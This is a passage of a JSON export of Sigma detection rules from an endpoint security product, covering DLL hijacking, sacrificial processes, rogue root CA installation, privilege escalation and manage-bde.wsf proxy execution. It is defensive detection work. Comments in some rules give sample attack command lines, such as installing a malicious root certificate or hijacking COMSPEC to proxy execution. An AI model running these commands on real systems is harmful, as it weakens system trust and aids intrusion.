into them for nefarious purposes.\n It is recommended to investigate the parent process performing this action to determine the legitimacy of this behavior.\nreferences:\n - https://www.todyl.com/blog/investigating-malicious-use-onenote-deploy-qbot\n - https://attack.mitre.org/techniques/T1055/\ndate: 2025/09/02\nmodified: 2025/09/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProcessTampering\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\ATBroker.exe'\n CommandLine|endswith: '\\ATBroker.exe'\n ParentImage|contains: '?'\n\n filter_legitimate_parent:\n ParentImage: '?:\\Windows\\System32\\winlogon.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "218a81a4-f938-453b-aa3e-57226b82c69c", "rule_name": "ATBroker.exe Sacrificial Process Spawned", "rule_description": "Detects the suspicious execution of the legitimate ATBroker.exe Windows binary, spawned without arguments and in an abnormal execution context.\nThis can be indicative that the binary is being used as a sacrificial or hollowed process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nIt is recommended to investigate the parent process performing this action to determine the legitimacy of this behavior.\n", "rule_creation_date": "2025-09-02", "rule_modified_date": "2025-09-02", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1055" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "21a54f04-8b55-4e87-95f8-60eaebb762b6", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.617275Z", "creation_date": "2026-03-23T11:45:34.617277Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.617281Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md", "https://attack.mitre.org/techniques/T1553/004/" ], "name": "t1553_004_install_root_ca.yml", "content": "title: Root Certificate Authority Installed\nid: 21a54f04-8b55-4e87-95f8-60eaebb762b6\ndescription: |\n Detects when a new root certificate authority is added to the macOS system keychain.\n Attackers may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n Root certificates are used in public key cryptography to identify a root certificate authority (CA).\n When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.\n Certificates are commonly used for establishing secure TLS/SSL communications within a web browser.\n When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk.\n Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system.\n It is recommended to investigate the process that added the certificate and the certificate itself to determine if this action was legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md\n - https://attack.mitre.org/techniques/T1553/004/\ndate: 2022/08/29\nmodified: 2025/11/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.004\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Security\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.SystemModification\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n # security add-trusted-cert -d -k \"/Library/Keychains/System.keychain\" \"/Users/user/maliciousCA.crt\"\n # security add-trusted-cert -d -r trustRoot -k \"/Library/Keychains/System.keychain\" \"/Users/user/maliciousCA.crt\"\n # security add-trusted-cert -d -r trustAsRoot -k \"/Library/Keychains/System.keychain\" \"/Users/user/maliciousCA.crt\"\n Image: '/usr/bin/security'\n CommandLine|contains|all:\n - 'add-trusted-cert'\n - '-d'\n - '-k'\n - '/Library/Keychains/System.keychain'\n exclusion_deny:\n # security add-trusted-cert -d -r deny -k \"/Library/Keychains/System.keychain\" \"/Users/user/untrustedCA.crt\"\n CommandLine|contains|all:\n - '-r'\n - 'deny'\n\n exclusion_autofirma:\n ProcessParentCommandLine|startswith: 'sudo -s security -i add-trusted-cert -d -r * -k /library/keychains/system.keychain /users/*/library/application support/autofirma/'\n\n exclusion_cloudflarewarp:\n ProcessParentImage: '/applications/cloudflare warp.app/contents/resources/cloudflarewarp'\n\n exclusion_olfeo:\n ProcessParentImage: '/usr/local/bin/trustlane_authentication_agent'\n\n exclusion_homebrew:\n ProcessGrandparentImage: '/opt/homebrew/Cellar/mkcert/*/bin/mkcert'\n\n exclusion_make:\n ProcessGrandparentImage:\n - '/Applications/Xcode.app/Contents/Developer/usr/bin/make'\n - '/Library/Developer/CommandLineTools/usr/bin/make'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "21a54f04-8b55-4e87-95f8-60eaebb762b6", "rule_name": "Root Certificate Authority Installed", "rule_description": "Detects when a new root certificate authority is added to the macOS system keychain.\nAttackers may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\nRoot certificates are used in public key cryptography to identify a root certificate authority (CA).\nWhen a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.\nCertificates are commonly used for establishing secure TLS/SSL communications within a web browser.\nWhen a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk.\nDepending on the security settings, the browser may not allow the user to establish a connection to the website.\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system.\nIt is recommended to investigate the process that added the certificate and the certificate itself to determine if this action was legitimate.\n", "rule_creation_date": "2022-08-29", "rule_modified_date": "2025-11-10", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1553.004" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "21a87deb-69d2-4659-9a98-c8d3b13dae95", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.097581Z", "creation_date": "2026-03-23T11:45:34.097583Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.097587Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://wietze.github.io/blog/save-the-environment-variables", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_control.yml", "content": "title: DLL Hijacking via CONTROL.exe\nid: 21a87deb-69d2-4659-9a98-c8d3b13dae95\ndescription: |\n Detects potential Windows DLL Hijacking via CONTROL.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CONTROL.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\explorerframe.dll'\n - '\\mswb7.dll'\n - '\\propsys.dll'\n - '\\shell32.dll'\n - '\\structuredquery.dll'\n - '\\windows.storage.dll'\n - '\\windows.storage.search.dll'\n - '\\edputil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "21a87deb-69d2-4659-9a98-c8d3b13dae95", "rule_name": "DLL Hijacking via CONTROL.exe", "rule_description": "Detects potential Windows DLL Hijacking via CONTROL.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "21b2686f-5620-4cbb-b0ba-f7ccc728e1f6", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.070008Z", "creation_date": "2026-03-23T11:45:34.070010Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.070014Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://attack.mitre.org/techniques/T1036/005/" ], "name": "t1036_005_dll_load_from_perflogs_folder.yml", "content": "title: DLL Loaded from PerfLogs Folder\nid: 21b2686f-5620-4cbb-b0ba-f7ccc728e1f6\ndescription: |\n Detects the suspicious loading of a DLL from the PerfLogs folder.\n This folder is an uncommon directory for DLL loading and is often abused by attackers.\n It is recommended to investigate the executed binary to determine its legitimacy.\nreferences:\n - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2023/03/13\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|startswith: '?:\\PerfLogs\\'\n condition: selection\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "21b2686f-5620-4cbb-b0ba-f7ccc728e1f6", "rule_name": "DLL Loaded from PerfLogs Folder", "rule_description": "Detects the suspicious loading of a DLL from the PerfLogs folder.\nThis folder is an uncommon directory for DLL loading and is often abused by attackers.\nIt is recommended to investigate the executed binary to determine its legitimacy.\n", "rule_creation_date": "2023-03-13", "rule_modified_date": "2025-01-28", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1036.005" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "21c73ea5-e857-4d58-8795-052869485f7d", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.098193Z", "creation_date": "2026-03-23T11:45:34.098195Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.098200Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_lbtwizgi.yml", "content": "title: DLL Hijacking via LBTWizGi.exe\nid: 21c73ea5-e857-4d58-8795-052869485f7d\ndescription: |\n Detects potential Windows DLL Hijacking via LBTWizGi.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Logitech executable alongside the malicious DLL.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/07\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'LBTWizGi.exe'\n ProcessSignature: 'Logitech Inc'\n ImageLoaded|endswith: '\\LBTServ.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Logitech\\setpointp\\'\n - '?:\\Program Files (x86)\\Logitech\\setpointp\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Common Files\\Logitech\\Bluetooth\\'\n - '?:\\Program Files (x86)\\Common Files\\Logitech\\Bluetooth\\'\n - '?:\\Program Files\\Common Files\\LogiShrd\\Bluetooth\\'\n - '?:\\Program Files (x86)\\Common Files\\LogiShrd\\Bluetooth\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Company|contains: 'Logitech'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "21c73ea5-e857-4d58-8795-052869485f7d", "rule_name": "DLL Hijacking via LBTWizGi.exe", "rule_description": "Detects potential Windows DLL Hijacking via LBTWizGi.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Logitech executable alongside the malicious DLL.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-07", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "21db6605-c463-47b7-8f9f-b912e8fc55e9", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.598895Z", "creation_date": "2026-03-23T11:45:34.598898Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.598905Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/itm4n/PrintSpoofer", "https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://attack.mitre.org/techniques/T1134/", "https://attack.mitre.org/techniques/T1068/" ], "name": "t1134_suspicious_child_process_integrity_level.yml", "content": "title: Suspicious Child Process Integrity Level\nid: 21db6605-c463-47b7-8f9f-b912e8fc55e9\ndescription: |\n Detects a child process spawned with a SYSTEM integrity level by a parent with a lower one.\n This can be the result of an exploitation to elevate privilege to System level.\n For example, the PrintSpoofer exploitation, that abuses SeImpersonatePrivilege via Named Pipe Impersonation, can be used to achieve this type of privilege escalation.\n It is recommended to analyze both the parent process and the process itself to look for malicious content and subsequent malicious actions.\nreferences:\n - https://github.com/itm4n/PrintSpoofer\n - https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/\n - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n - https://attack.mitre.org/techniques/T1134/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/08/17\nmodified: 2025/10/09\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1134\n - attack.t1068\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n IntegrityLevel: 'System'\n\n filter_parent_system:\n ParentIntegrityLevel: 'System'\n\n exclusion_unknown:\n ParentIntegrityLevel:\n - 'Unknown'\n - ''\n\n exclusion_ansible:\n CommandLine|contains:\n - 'powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand CgAgACAAIAAgACYAYwBoAGMAcAAuAGMAbwBtACAANgA1ADAAMAAxACAAPgAgACQAbgB1AGwAbAAKACAAIAAgACAAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQAKACAAIAAgACAAJABzAHAAbABpAHQAXwBwAGEAcgB0AHMAIAA9ACAAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByAC4AUwBwAGwAaQB0ACgAQAAoACIAYAAwAGAAMABgADAAYAAwACIAKQAsACAAMgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBSAGUAbQBvAHYAZQBFAG0AcAB0AHkARQBuAHQAcgBpAGUAcwApAAoAIAAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAGoAcwBvAG4AXwByAGEAdwAgAC0AVgBhAGwAdQBlACAAJABzAHAAbABpAHQAXwBwAGEAcgB0AHMAWwAxAF0ACgAgACAAIAAgACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAIAAgACAAIAAmACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIACgA='\n - ' $msg = \"ANSIBLE_BOOTSTRAP_ERROR: $(ConvertTo-Json $result -Compress)\" Write-Host $msg exit -1 } }'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "21db6605-c463-47b7-8f9f-b912e8fc55e9", "rule_name": "Suspicious Child Process Integrity Level", "rule_description": "Detects a child process spawned with a SYSTEM integrity level by a parent with a lower one.\nThis can be the result of an exploitation to elevate privilege to System level.\nFor example, the PrintSpoofer exploitation, that abuses SeImpersonatePrivilege via Named Pipe Impersonation, can be used to achieve this type of privilege escalation.\nIt is recommended to analyze both the parent process and the process itself to look for malicious content and subsequent malicious actions.\n", "rule_creation_date": "2022-08-17", "rule_modified_date": "2025-10-09", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1068", "attack.t1134" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "21e24d1c-fc56-4c13-937d-8036bd091278", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.597706Z", "creation_date": "2026-03-23T11:45:34.597711Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.597722Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_logserver.yml", "content": "title: DLL Hijacking via LogServer.exe\nid: 21e24d1c-fc56-4c13-937d-8036bd091278\ndescription: |\n Detects potential Windows DLL Hijacking via LogServer.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/26\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'LogServer'\n ProcessSignature: 'Trend Micro, Inc.'\n ImageLoaded|endswith: '\\ofcpipc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Trend Micro\\'\n - '?:\\Program Files (x86)\\Trend Micro\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Trend Micro\\'\n - '?:\\Program Files (x86)\\Trend Micro\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Trend Micro, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "21e24d1c-fc56-4c13-937d-8036bd091278", "rule_name": "DLL Hijacking via LogServer.exe", "rule_description": "Detects potential Windows DLL Hijacking via LogServer.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-10-26", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2216764d-df8a-4e07-bb45-54a387f5b02b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.070621Z", "creation_date": "2026-03-23T11:45:34.070624Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.070630Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", "https://attack.mitre.org/techniques/T1216/" ], "name": "t1216_manage_bde_wsf_execution.yml", "content": "title: Suspicious Proxy Execution via manage-bde.wsf\nid: 2216764d-df8a-4e07-bb45-54a387f5b02b\ndescription: |\n Detects the malicious execution of the legitimate manage-bde.wsf script to proxy execution of malicious binaries through the hijacking of the manage-bde.exe binary.\n The goal is to plant a manage-bde.exe binary in the current directory to execute it rather than the legitimate binary in System32.\n Attackers may abuse it to bypass security restrictions.\n This script which is used to manage BitLocker and has been deprecated since Windows 7 while manage-bde.exe should be used instead.\n It is recommended to analyze the process responsible for the execution of the manage-bde.wsf script to look for malicious content and other suspicious actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/\n - https://attack.mitre.org/techniques/T1216/\ndate: 2022/01/27\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.ManageBDE\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # set comspec=c:\\windows\\system32\\calc.exe & cscript c:\\windows\\system32\\manage-bde.wsf\n selection:\n ParentImage|endswith: '\\cscript.exe'\n ParentCommandLine|contains: 'manage-bde.wsf'\n\n exclusion_normal_execution:\n Image: '?:\\Windows\\System32\\cmd.exe'\n CommandLine: '?:\\Windows\\system32\\cmd.exe /c manage-bde.exe -legacy_Vista*'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\n# level: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2216764d-df8a-4e07-bb45-54a387f5b02b", "rule_name": "Suspicious Proxy Execution via manage-bde.wsf", "rule_description": "Detects the malicious execution of the legitimate manage-bde.wsf script to proxy execution of malicious binaries through the hijacking of the manage-bde.exe binary.\nThe goal is 